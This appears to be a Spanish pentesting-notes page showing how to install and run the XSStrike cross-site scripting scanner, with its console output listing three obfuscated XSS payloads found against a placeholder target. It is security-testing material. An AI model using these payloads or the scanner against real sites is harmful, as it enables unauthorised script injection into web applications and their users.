XSStrike Herramienta
sudo apt-get install python3-pipgit clone https://github.com/s0md3v/XSStrike.git
cd XSStrike/pip3 install -r requirements.txtsudo python3 xsstrike.py -u "URL_Vuln" --timeout 50 XSStrike v3.1.5
/home/dise0/Desktop/XSStrike/core/dom.py:27: SyntaxWarning: invalid escape sequence '\$'
controlledVariables.add(re.search(r'[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', '\$'))
/home/dise0/Desktop/XSStrike/core/dom.py:36: SyntaxWarning: invalid escape sequence '\$'
controlledVariables.add(re.search(r'[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', '\$'))
[~] Checking for DOM vulnerabilities
[+] Potentially vulnerable objects found
------------------------------------------------------------
------------------------------------------------------------ailed-td").innerHTML=lMessage;
[+] WAF Status: Offline
[!] Testing parameter: page
[!] Reflections found: 5
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 15456
------------------------------------------------------------
[+] Payload: <HTml%09oNmOusEovER%0a=%0a(prompt)``>
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N] y
------------------------------------------------------------
[+] Payload: <a%09onmOUSEOVEr%0a=%0aconfirm()%0dx>v3dm0s
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N] y
------------------------------------------------------------
[+] Payload: <a/+/ONPOiNteREnTEr%0a=%0aa=prompt,a()>v3dm0s
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N] nPreviousCSRF (Cross-site request forgery)NextOtras técnicas de explotación (Cookie Tampering, command injection...)
Last updated